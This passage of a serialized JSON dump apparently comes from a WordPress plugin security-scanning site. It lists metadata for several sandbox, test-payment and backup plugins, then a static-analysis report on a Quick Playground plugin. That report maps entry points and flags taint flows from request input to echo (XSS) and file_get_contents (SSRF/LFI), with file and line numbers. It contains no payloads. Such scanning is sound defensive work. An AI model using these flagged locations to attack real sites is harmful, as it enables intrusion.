allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FoicwILzz0Yo?si=3ulohkktYtP4crDF\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Features of Pro Plugin:\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Able to create multiple Reset Points.\u003C\u002Fli>\n\u003Cli>Manual Demo Reset execution capability.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a regular URL.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a RESTful URL.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via server Cron Jobs directly.\u003C\u002Fli>\n\u003Cli>The entire Database and Media Library can be reset to the selected Reset Point.\u003C\u002Fli>\n\u003Cli>Offers options to avoid forceful log out on logged-in users during the Reset process.\u003C\u002Fli>\n\u003Cli>Displays the Demo Reset Status (THAWED state or FROZEN state) on the WP Admin Bar.\u003C\u002Fli>\n\u003Cli>THAWED State Website Isolation capability to prevent unnecessary changes to the website.\u003C\u002Fli>\n\u003Cli>Capable of allowing users to upload new media files and trash already uploaded files in the FROZEN state. (Images, PDFs etc.)\u003C\u002Fli>\n\u003Cli>There will be no accumulation of abandoned files in the uploads directory because the Media Library will reset with every reset run.\u003C\u002Fli>\n\u003Cli>Plugins, Themes are WP Core auto updates are restricted, but can update manually in the THAWED state.\u003C\u002Fli>\n\u003Cli>Able to deploy Demo Websites for both Admin and Non-admin users. Only Admin who activate the Demo Reset plugin can access its setup features.\u003C\u002Fli>\n\u003Cli>Displays the Demo Reset Countdown Timer showing the time remaining for the next Reset.\u003C\u002Fli>\n\u003Cli>Shows the customizable Promo Bar at the top of the Demo Website on both admin and public sides.\u003C\u002Fli>\n\u003Cli>Options to display the Promo Bar on the admin side, public side, both, or hide it entirely.\u003C\u002Fli>\n\u003Cli>Features your Logo and Brand Name on the Promo Bar, linking your Business Website to the Demo site.\u003C\u002Fli>\n\u003Cli>Highlights your Special Offers or Promotions on the Promo Bar, linking your Landing Page to the Demo site.\u003C\u002Fli>\n\u003Cli>Capable of providing your Phone Number and Email Address for Demo users as Promo Bar Tools.\u003C\u002Fli>\n\u003Cli>Includes your Help Articles for Demo users as a Promo Bar tool.\u003C\u002Fli>\n\u003Cli>Able to add Extra Links for Demo users as a Promo Bar tool.\u003C\u002Fli>\n\u003Cli>Capable of sending an email notification at the end of each Reset Cycle.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Demo Reset Documentation: \u003Ca href=\"https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\" rel=\"nofollow ugc\">https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\u003C\u002Fa>\u003C\u002Fp>\n","Let customers explore your Demo Websites beyond the frontend. Let them try as Editor, Author, Subscriber or Anyone—without risking permanent changes.",720,100,"2025-12-26T06:58:00.000Z","5.6","7.4",[18,91,19,92,21],"digital-store","sandbox","https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdemo-reset.2.0.1.zip",{"slug":96,"name":97,"version":98,"author":99,"author_profile":100,"description":101,"short_description":102,"active_installs":103,"downloaded":104,"rating":86,"num_ratings":25,"last_updated":105,"tested_up_to":106,"requires_at_least":107,"requires_php":89,"tags":108,"homepage":111,"download_link":112,"security_score":86,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":27},"sandbox-payment-gateway","Sandbox Payment Gateway for WooCommerce","1.0.4","webmonk","https:\u002F\u002Fprofiles.wordpress.org\u002Fwebmonk\u002F","\u003Cp>Sandbox Payment Gateway eliminates the need to create coupons or configure real payment gateways when testing your WooCommerce checkout. It provides two fake payment methods that simulate real checkout behavior without processing any actual payments.\u003C\u002Fp>\n\u003Ch4>Sandbox Credit Card\u003C\u002Fh4>\n\u003Cp>Accepts any valid credit card number with Luhn algorithm validation, expiry date checks, and CVV verification.\u003C\u002Fp>\n\u003Ch4>Sandbox ACH \u002F eCheck\u003C\u002Fh4>\n\u003Cp>Accepts check name, routing number (9 digits), and account number (4-17 digits). Successful payments are placed on-hold to simulate real-world eCheck verification.\u003C\u002Fp>\n\u003Ch4>Simulating a successful credit card transaction\u003C\u002Fh4>\n\u003Cp>Use any valid credit card details (e.g. card number 4111111111111111).\u003C\u002Fp>\n\u003Ch4>Simulating a failed credit card transaction\u003C\u002Fh4>\n\u003Cp>Use card number 4929000000022 with a valid expiry and CVV.\u003C\u002Fp>\n\u003Ch4>Simulating a successful eCheck transaction\u003C\u002Fh4>\n\u003Cp>Use any valid 9-digit routing number and 4-17 digit account number.\u003C\u002Fp>\n\u003Ch4>Simulating a failed eCheck transaction\u003C\u002Fh4>\n\u003Cp>Use routing number 000000000 with any valid account number.\u003C\u002Fp>\n\u003Ch4>Refunds\u003C\u002Fh4>\n\u003Cp>Both gateways support refunds from the WooCommerce admin order page. Since payments are simulated, refunds simply log a note on the order.\u003C\u002Fp>\n\u003Ch4>Development\u003C\u002Fh4>\n\u003Cp>The development of this plugin happens at \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwebmonk\u002Fsandbox-payment-gateway\" rel=\"nofollow ugc\">GitHub\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>If you want to contribute, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwebmonk\u002Fsandbox-payment-gateway\" rel=\"nofollow ugc\">fork the project\u003C\u002Fa> and send a pull request.\u003C\u002Fp>\n","Fake credit card and ACH\u002FeCheck payment gateways for testing WooCommerce checkout flows.",300,4207,"2026-03-22T02:21:00.000Z","6.8.5","4.7",[18,109,92,21,110],"payment-gateways","woocommerce","http:\u002F\u002Fcodemypain.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsandbox-payment-gateway.zip",{"slug":19,"name":114,"version":115,"author":116,"author_profile":117,"description":118,"short_description":119,"active_installs":120,"downloaded":121,"rating":122,"num_ratings":123,"last_updated":124,"tested_up_to":125,"requires_at_least":126,"requires_php":127,"tags":128,"homepage":129,"download_link":130,"security_score":131,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":27},"Sandbox Site powered by Playground","0.1.8","Bero","https:\u002F\u002Fprofiles.wordpress.org\u002Fberislavgrgicak\u002F","\u003Cp>With this plugin, you can:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Create a copy of your site in a private WordPress Playground instance.\u003C\u002Fli>\n\u003Cli>Test plugins from the WordPress plugin directory without actually installing them on your site.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Your site is cloned in Playground by copying all the files and a database into WordPress Playground. It may sound scary, but your data stays safely with you and is \u003Cstrong>not\u003C\u002Fstrong> uploaded to any cloud service. Instead, your site’s data is shipped directly to your web browser where it stays only as long as you keep your browser tab open. That’s right! WordPress Playground runs a copy of your site directly on your device.\u003C\u002Fp>\n\u003Ch3>Usage\u003C\u002Fh3>\n\u003Ch4>Starting a sandbox\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Open \u003Ccode>\u002Fwp-admin\u002F\u003C\u002Fcode> on your site\u003C\u002Fli>\n\u003Cli>Click on \u003Cem>Sandbox Site\u003C\u002Fem> in the \u003Cem>Tools\u003C\u002Fem> menu to load WordPress Playground with a copy of your site content\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Testing a plugin\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Open \u003Ccode>\u002Fwp-admin\u002F\u003C\u002Fcode> on your site\u003C\u002Fli>\n\u003Cli>Click on \u003Cem>Add Plugins\u003C\u002Fem> in the \u003Cem>Plugins\u003C\u002Fem> menu\u003C\u002Fli>\n\u003Cli>Find a plugin you want to test\u003C\u002Fli>\n\u003Cli>Click the \u003Cem>Preview Now\u003C\u002Fem> button\u003C\u002Fli>\n\u003Cli>The plugin will be installed and activated in WordPress Playground with a copy of your site content\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>All features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Start a sandbox of your site\u003C\u002Fli>\n\u003Cli>Preview a plugin installation from the WordPress.org repository\u003C\u002Fli>\n\u003Cli>Export Playground snapshots using Tools > Export\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Resources\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002FWordPress\u002Fplayground-tools\u002Ftree\u002Ftrunk\u002Fpackages\u002Fplayground\" rel=\"nofollow ugc\">Source code\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdeveloper.wordpress.org\u002Fplayground\" rel=\"nofollow ugc\">WordPress Playground\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.github.io\u002Fwordpress-playground\u002F\" rel=\"nofollow ugc\">WordPress Playground repository\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>For any issues or questions about the WordPress Playground plugin, please open a GitHub issue in the \u003Ca href=\"https:\u002F\u002Fgithub.com\u002FWordPress\u002Fplayground-tools\" rel=\"nofollow ugc\">playground-tools\u003C\u002Fa> repository.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>This is an early preview to gather feedback and apply polish. This plugin isn’t yet a well-rounded and feature-complete solution.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>The WordPress Playground Plugin is licensed under the GNU General Public License v2.0. This is a free software license that allows you to use, modify, and distribute the software, provided you adhere to its terms and conditions.\u003C\u002Fp>\n","Short description\n\nEnables running a sandbox of your site using WordPress Playground (https:\u002F\u002Fgithub.com\u002FWordPress\u002Fwordpress-playground)",40,5061,80,2,"2024-06-12T22:00:00.000Z","6.6.5","6.0","8.0",[19,92,20],"https:\u002F\u002Fgithub.com\u002FWordPress\u002Fplayground-tools\u002Ftree\u002Ftrunk\u002Fpackages\u002Fplayground","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fplayground.0.1.8.zip",92,{"slug":133,"name":134,"version":135,"author":136,"author_profile":137,"description":138,"short_description":139,"active_installs":11,"downloaded":140,"rating":11,"num_ratings":11,"last_updated":141,"tested_up_to":14,"requires_at_least":126,"requires_php":127,"tags":142,"homepage":145,"download_link":146,"security_score":86,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":147},"diluted-test-order-for-woocommerce","Diluted Test Order for WooCommerce","1.0.0","Diluted","https:\u002F\u002Fprofiles.wordpress.org\u002Fdilutedplugins\u002F","\u003Cp>This plugin adds a WooCommerce payment method that completes checkout without a real payment provider. Orders are saved and marked paid like a normal purchase, only the payment is fake.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Admin-only\u003C\u002Fstrong> – Only users who can \u003Ccode>manage_woocommerce\u003C\u002Fcode> (typically administrators and shop managers) see the method at checkout. Guests and customers never see it.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Paid immediately\u003C\u002Fstrong> – Orders complete as if payment succeeded. Stock updates, emails, and other post-payment behavior run as usual.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Works everywhere you check out\u003C\u002Fstrong> – Shortcode\u002Fclassic checkout and the Cart & Checkout blocks.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Sign in as a user with the \u003Cstrong>Shop manager\u003C\u002Fstrong> or \u003Cstrong>Administrator\u003C\u002Fstrong> role (or any role that includes \u003Ccode>manage_woocommerce\u003C\u002Fcode>).\u003C\u002Fli>\n\u003Cli>Add products to the cart and open checkout.\u003C\u002Fli>\n\u003Cli>Choose the test payment method in the checkout, the default label is \u003Cstrong>Test order (fake payment)\u003C\u002Fstrong> unless you changed it under the gateway settings.\u003C\u002Fli>\n\u003Cli>Place the order. You are redirected to the order received (thank-you) page; the order is recorded as paid.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>You can customize the \u003Cstrong>Title\u003C\u002Fstrong> and \u003Cstrong>Description\u003C\u002Fstrong> shown at checkout under \u003Cstrong>WooCommerce \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Settings \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Payments \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Test order (admin only)\u003C\u002Fstrong>.\u003C\u002Fp>\n","Adds a fake payment method so you can test the full checkout flow without a real payment provider. Ideal for staging, QA and local development.",85,"2026-03-25T20:59:00.000Z",[143,144,20,21,110],"checkout","payment","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fdiluted-test-order-for-woocommerce\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdiluted-test-order-for-woocommerce.1.0.0.zip","2026-04-06T09:54:40.288Z",{"slug":149,"name":150,"version":151,"author":152,"author_profile":153,"description":154,"short_description":155,"active_installs":156,"downloaded":157,"rating":158,"num_ratings":159,"last_updated":160,"tested_up_to":14,"requires_at_least":161,"requires_php":162,"tags":163,"homepage":16,"download_link":168,"security_score":169,"vuln_count":170,"unpatched_count":11,"last_vuln_date":171,"fetched_at":27},"wpvivid-backuprestore","WPvivid — Backup, Migration & Staging","0.9.125","wpvividplugins","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpvividplugins\u002F","\u003Cp>WPvivid Backup & Migration Plugin offers backup, migration, and staging (create a staging site on a subdirectory to safely test WordPress, plugins, themes and website changes) as basic features.\u003C\u002Fp>\n\u003Ch3>WPvivid Backup & Migration for MainWP\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwpvivid-backup-mainwp\u002F\" rel=\"ugc\">WPvivid Backup & Migration for MainWP\u003C\u002Fa> is now available to download.\u003Cbr \u002F>\nWPvivid Backup & Migration for MainWP allows you to set up and control WPvivid Backup & Migration plugins for all child sites directly from your MainWP dashboard.\u003C\u002Fp>\n\u003Ch3>WPvivid Backup & Migration Pro is Now Available\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Customize everything to backup\u003C\u002Fli>\n\u003Cli>Create staging sites and push staging sites to live\u003C\u002Fli>\n\u003Cli>Incremental backups\u003C\u002Fli>\n\u003Cli>Database backup encryption\u003C\u002Fli>\n\u003Cli>Auto backup WordPress, themes, and plugins\u003C\u002Fli>\n\u003Cli>WordPress multisite backup\u003C\u002Fli>\n\u003Cli>WordPress multisite staging\u003C\u002Fli>\n\u003Cli>Create a fresh WP install\u003C\u002Fli>\n\u003Cli>Advanced remote backups\u003C\u002Fli>\n\u003Cli>Advanced backup schedules\u003C\u002Fli>\n\u003Cli>Restore remote backups\u003C\u002Fli>\n\u003Cli>Migrate a site via remote storage\u003C\u002Fli>\n\u003Cli>Migrate a childsite (MU) to a single WordPress install\u003C\u002Fli>\n\u003Cli>White label WPvivid Backup & Migration Pro\u003C\u002Fli>\n\u003Cli>Control user access to WPvivid Backup & Migration Pro\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwpvivid.com\u002Fbackup-plugin-pro\" rel=\"nofollow ugc\">More amazing features\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>See a review video on WPvivid Backup & Migration Pro:\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FD1aYbayFpfU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&start=7&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwpvivid.com\u002Fpricing\" rel=\"nofollow ugc\">Get WPvivid Backup & Migration Pro\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Core Features\u003C\u002Fh3>\n\u003Ch4>1. Easy Backups\u003C\u002Fh4>\n\u003Cp>Easily create a backup of your WordPress site. You can choose to backup the entire site(database+files), all files, or database only.\u003C\u002Fp>\n\u003Ch4>2. Auto Migration\u003C\u002Fh4>\n\u003Cp>Clone and migrate your WordPress site to a new domain with a single click. WPvivid Backup & Migration Plugin supports site migration from dev environment to a new server, from dev environment to a new domain or from a live server to another.\u003C\u002Fp>\n\u003Ch4>3. Create A Staging Site\u003C\u002Fh4>\n\u003Cp>Create a staging site on a subdirectory of your production site to safely test WordPress, plugins, themes and website changes. You can choose what to copy from the the live site to the staging site.\u003C\u002Fp>\n\u003Ch4>4. Scheduled Backups\u003C\u002Fh4>\n\u003Cp>Set a schedule to run backups automatically on your website. You can set the backups to run every 12 hours, daily, weekly, fortnightly, monthly, choose backup items and destination.\u003C\u002Fp>\n\u003Ch4>5. Offsite Backup to Remote Storage\u003C\u002Fh4>\n\u003Cp>Send your backups offsite to a remote location. WPvivid Backup & Migration Plugin supports the leading cloud storage providers: Dropbox, Google Drive, Amazon S3, Microsoft OneDrive, DigitalOcean Spaces, FTP and SFTP.\u003C\u002Fp>\n\u003Ch4>6. One-Click Restore\u003C\u002Fh4>\n\u003Cp>Restore your WordPress site from a backup with a single click.\u003C\u002Fp>\n\u003Ch4>7. Cloud Storage Supported\u003C\u002Fh4>\n\u003Cp>WPvivid Backup & Migration plugin supports Dropbox, Google Drive, Microsoft OneDrive, Amazon S3, DigitalOcean Spaces, SFTP, FTP. WPvivid Backup & Migration Pro also supports Wasabi, pCloud, Backblaze, WebDav and more.\u003C\u002Fp>\n\u003Ch3>Minimum Requirements to use WPvivid Backup & Migration plugin\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Character Encoding UTF-8\u003C\u002Fli>\n\u003Cli>PHP version 5.3\u003C\u002Fli>\n\u003Cli>MySQL version 4.1\u003C\u002Fli>\n\u003Cli>WordPress 4.5\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin can optionally connect to third-party storage providers — Google Drive, Dropbox, Microsoft OneDrive, Amazon S3, DigitalOcean Spaces, and FTP\u002FSFTP servers — to store backup files. When remote storage is enabled, backup archives and required authentication tokens are sent to the selected service’s API. Use of these services is subject to their own terms and privacy policies.\u003C\u002Fp>\n","Migrate, staging, backup WordPress, all in one.",900000,16261440,98,1462,"2026-03-25T00:20:00.000Z","4.5","5.3",[164,165,166,167,20],"backup","clone","duplicate","migrate","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpvivid-backuprestore.0.9.125.zip",75,26,"2026-02-10 17:13:35",{"attackSurface":173,"codeSignals":295,"taintFlows":347,"riskAssessment":609,"analyzedAt":618},{"hooks":174,"ajaxHandlers":285,"restRoutes":286,"shortcodes":287,"cronEvents":294,"entryPointCount":123,"unprotectedCount":11},[175,182,185,188,192,195,197,202,206,209,213,216,220,225,229,233,237,240,244,248,251,254,257,261,263,266,269,274,278,282],{"type":176,"name":177,"callback":178,"priority":179,"file":180,"line":181},"action","init","closure",999,"api.php",7,{"type":176,"name":183,"callback":178,"priority":179,"file":180,"line":184},"wp_loaded",15,{"type":176,"name":186,"callback":178,"file":180,"line":187},"rest_api_init",857,{"type":176,"name":189,"callback":190,"file":45,"line":191},"shutdown","qckply_sync_ids",38,{"type":176,"name":193,"callback":193,"file":194,"line":123},"qckply_clone_pro_form","client.php",{"type":176,"name":186,"callback":178,"file":48,"line":196},813,{"type":176,"name":198,"callback":199,"priority":200,"file":49,"line":201},"qckply_form_demo_content","qckply_form_demo_pro_content",10,4,{"type":176,"name":203,"callback":204,"priority":200,"file":49,"line":205},"qckply_form_steps","qckply_pro_form_steps",36,{"type":176,"name":207,"callback":207,"file":49,"line":208},"qckply_sideload_saved_image",229,{"type":176,"name":210,"callback":211,"file":212,"line":201},"wp_footer","qckply_clone_footer_message","filters.php",{"type":176,"name":214,"callback":211,"file":212,"line":215},"admin_footer",5,{"type":217,"name":218,"callback":218,"file":212,"line":219},"filter","qckply_key_message",30,{"type":176,"name":221,"callback":222,"file":223,"line":224},"plugins_loaded","quickplayground_expro_includes","includes.php",18,{"type":176,"name":226,"callback":227,"file":223,"line":228},"admin_notices","quickplayground_expro_notice",44,{"type":176,"name":177,"callback":230,"file":231,"line":232},"qckply_qckply_block_init","qckply\u002Fqckply.php",46,{"type":176,"name":177,"callback":234,"file":235,"line":236},"qckply_iframe","qckply-iframe.php",35,{"type":176,"name":177,"callback":238,"file":239,"line":201},"qckply_loading","qckply-loading.php",{"type":176,"name":241,"callback":242,"file":51,"line":243},"admin_enqueue_scripts","qckply_enqueue_admin_script",149,{"type":176,"name":245,"callback":246,"file":51,"line":247},"wp_enqueue_scripts","qckply_enqueue_script",150,{"type":176,"name":177,"callback":249,"file":250,"line":54},"qckply_update_tracking","quickplayground-updates.php",{"type":176,"name":252,"callback":253,"priority":200,"file":250,"line":181},"wp_after_insert_post","qckply_post_updated",{"type":176,"name":255,"callback":253,"priority":200,"file":250,"line":256},"post_updated",8,{"type":176,"name":258,"callback":259,"file":250,"line":260},"updated_option","qckply_updated_option",9,{"type":176,"name":262,"callback":259,"file":250,"line":200},"added_option",{"type":176,"name":264,"callback":265,"priority":200,"file":250,"line":70},"added_post_meta","qckply_updated_postmeta",{"type":176,"name":267,"callback":265,"priority":200,"file":250,"line":268},"updated_postmeta",12,{"type":176,"name":270,"callback":271,"priority":272,"file":273,"line":219},"admin_bar_menu","qckply_toolbar_link",50,"utility.php",{"type":176,"name":275,"callback":276,"file":273,"line":277},"admin_menu","qckply_design_qckply_menus",113,{"type":217,"name":279,"callback":280,"file":273,"line":281},"qckply_blueprint","qckply_fix_variables",783,{"type":217,"name":283,"callback":178,"priority":200,"file":273,"line":284},"wp_calculate_image_srcset",1271,[],[],[288,290],{"tag":289,"callback":289,"file":235,"line":201},"qckply_iframe_shortcode",{"tag":291,"callback":292,"file":51,"line":293},"qckply_button","qckply_get_button_shortcode",199,[],{"dangerousFunctions":296,"sqlUsage":302,"outputEscaping":305,"fileOperations":345,"externalRequests":200,"nonceChecks":307,"capabilityChecks":123,"bundledLibraries":346},[297],{"fn":298,"file":299,"line":300,"context":301},"move_uploaded_file","qckply_upload.php",23,"if(move_uploaded_file($_FILES[\"json_upload\"][\"tmp_name\"], $target_file))",{"prepared":303,"raw":11,"locations":304},69,[],{"escaped":306,"rawEcho":307,"locations":308},640,16,[309,312,314,317,320,321,323,325,327,329,332,334,336,339,341,343],{"file":180,"line":310,"context":311},248,"raw output",{"file":180,"line":313,"context":311},250,{"file":315,"line":316,"context":311},"blueprint-settings-init.php",132,{"file":318,"line":319,"context":311},"client-prompts.php",73,{"file":46,"line":170,"context":311},{"file":46,"line":322,"context":311},59,{"file":46,"line":324,"context":311},62,{"file":50,"line":326,"context":311},323,{"file":50,"line":328,"context":311},340,{"file":330,"line":331,"context":311},"key_pages.php",90,{"file":333,"line":260,"context":311},"qckply\u002Fsrc\u002Fqckply\u002Frender.php",{"file":299,"line":335,"context":311},32,{"file":337,"line":338,"context":311},"quickplayground_design_clone.php",45,{"file":273,"line":340,"context":311},317,{"file":273,"line":342,"context":311},337,{"file":273,"line":344,"context":311},1224,25,[],[348,384,399,408,416,431,444,459,470,480,488,508,522,537,548,557,565,575,585,598],{"entryPoint":349,"graph":350,"unsanitizedCount":123,"severity":383},"qckply_builder (blueprint-builder.php:7)",{"nodes":351,"edges":378},[352,358,362,367,370,373],{"id":353,"type":354,"label":355,"file":356,"line":357},"n0","source","$_REQUEST","blueprint-builder.php",27,{"id":359,"type":360,"label":361,"file":356,"line":357},"n1","transform","→ qckply_blueprint_settings_init()",{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},"n2","sink","echo() [XSS]","echo",{"id":368,"type":354,"label":355,"file":356,"line":369},"n3",182,{"id":371,"type":360,"label":372,"file":356,"line":369},"n4","→ qckply_get_clone_posts()",{"id":374,"type":364,"label":375,"file":180,"line":376,"wp_function":377},"n5","file_get_contents() [SSRF\u002FLFI]",190,"file_get_contents",[379,380,381,382],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"from":368,"to":371,"sanitized":53},{"from":371,"to":374,"sanitized":53},"medium",{"entryPoint":385,"graph":386,"unsanitizedCount":123,"severity":383},"\u003Cblueprint-builder> (blueprint-builder.php:0)",{"nodes":387,"edges":394},[388,389,390,391,392,393],{"id":353,"type":354,"label":355,"file":356,"line":357},{"id":359,"type":360,"label":361,"file":356,"line":357},{"id":363,"type":364,"label":365,"file":315,"line":316,"wp_function":366},{"id":368,"type":354,"label":355,"file":356,"line":369},{"id":371,"type":360,"label":372,"file":356,"line":369},{"id":374,"type":364,"label":375,"file":180,"line":376,"wp_function":377},[395,396,397,398],{"from":353,"to":359,"sanitized":53},{"from":359,"to":363,"sanitized":53},{"from":368,"to":371,"sanitized":53},{"from":371,"to":374,"sanitized":53},{"entryPoint":400,"graph":401,"unsanitizedCount":25,"severity":383},"qckply_data (client-qckply_data.php:3)",{"nodes":402,"edges":406},[403,405],{"id":353,"type":354,"label":404,"file":45,"line":200},"$_POST['filename']",{"id":359,"type":364,"label":375,"file":45,"line":200,"wp_function":377},[407],{"from":353,"to":359,"sanitized":53},{"entryPoint":409,"graph":410,"unsanitizedCount":25,"severity":383},"\u003Cclient-qckply_data> (client-qckply_data.php:0)",{"nodes":411,"edges":414},[412,413],{"id":353,"type":354,"label":404,"file":45,"line":200},{"id":359,"type":364,"label":375,"file":45,"line":200,"wp_function":377},[415],{"from":353,"to":359,"sanitized":53},{"entryPoint":417,"graph":418,"unsanitizedCount":11,"severity":430},"qckply_blueprint_settings_init (blueprint-settings-init.php:9)",{"nodes":419,"edges":427},[420,423],{"id":353,"type":354,"label":421,"file":315,"line":422},"$_POST (x3)",22,{"id":359,"type":364,"label":424,"file":315,"line":425,"wp_function":426},"update_option() [Settings Manipulation]",49,"update_option",[428],{"from":353,"to":359,"sanitized":429},true,"low",{"entryPoint":432,"graph":433,"unsanitizedCount":11,"severity":430},"\u003Cblueprint-settings-init> (blueprint-settings-init.php:0)",{"nodes":434,"edges":441},[435,436,437,439],{"id":353,"type":354,"label":421,"file":315,"line":422},{"id":359,"type":364,"label":424,"file":315,"line":425,"wp_function":426},{"id":363,"type":354,"label":438,"file":315,"line":422},"$_POST (x2)",{"id":368,"type":364,"label":365,"file":315,"line":440,"wp_function":366},68,[442,443],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":445,"graph":446,"unsanitizedCount":11,"severity":430},"qckply_clone_prompts (client-prompts.php:3)",{"nodes":447,"edges":456},[448,451,452,455],{"id":353,"type":354,"label":449,"file":318,"line":450},"$_POST['show']",19,{"id":359,"type":364,"label":424,"file":318,"line":450,"wp_function":426},{"id":363,"type":354,"label":453,"file":318,"line":454},"$_GET",58,{"id":368,"type":364,"label":365,"file":318,"line":319,"wp_function":366},[457,458],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":460,"graph":461,"unsanitizedCount":11,"severity":430},"\u003Cclient-prompts> (client-prompts.php:0)",{"nodes":462,"edges":467},[463,464,465,466],{"id":353,"type":354,"label":449,"file":318,"line":450},{"id":359,"type":364,"label":424,"file":318,"line":450,"wp_function":426},{"id":363,"type":354,"label":453,"file":318,"line":454},{"id":368,"type":364,"label":365,"file":318,"line":319,"wp_function":366},[468,469],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"entryPoint":471,"graph":472,"unsanitizedCount":11,"severity":430},"qckply_sync_code_form (client-save-playground.php:318)",{"nodes":473,"edges":478},[474,477],{"id":353,"type":354,"label":475,"file":47,"line":476},"$_POST",336,{"id":359,"type":364,"label":424,"file":47,"line":342,"wp_function":426},[479],{"from":353,"to":359,"sanitized":429},{"entryPoint":481,"graph":482,"unsanitizedCount":11,"severity":430},"\u003Cclient-save-playground> (client-save-playground.php:0)",{"nodes":483,"edges":486},[484,485],{"id":353,"type":354,"label":475,"file":47,"line":476},{"id":359,"type":364,"label":424,"file":47,"line":342,"wp_function":426},[487],{"from":353,"to":359,"sanitized":429},{"entryPoint":489,"graph":490,"unsanitizedCount":11,"severity":430},"qckply_sync (expro-quickplayground-sync.php:8)",{"nodes":491,"edges":504},[492,495,497,499,501,502],{"id":353,"type":354,"label":493,"file":50,"line":494},"$_REQUEST (x2)",53,{"id":359,"type":364,"label":375,"file":50,"line":496,"wp_function":377},79,{"id":363,"type":354,"label":475,"file":50,"line":498},89,{"id":368,"type":364,"label":424,"file":50,"line":500,"wp_function":426},97,{"id":371,"type":354,"label":475,"file":50,"line":498},{"id":374,"type":364,"label":365,"file":50,"line":503,"wp_function":366},102,[505,506,507],{"from":353,"to":359,"sanitized":429},{"from":363,"to":368,"sanitized":429},{"from":371,"to":374,"sanitized":429},{"entryPoint":509,"graph":510,"unsanitizedCount":11,"severity":430},"\u003Cexpro-quickplayground-sync> 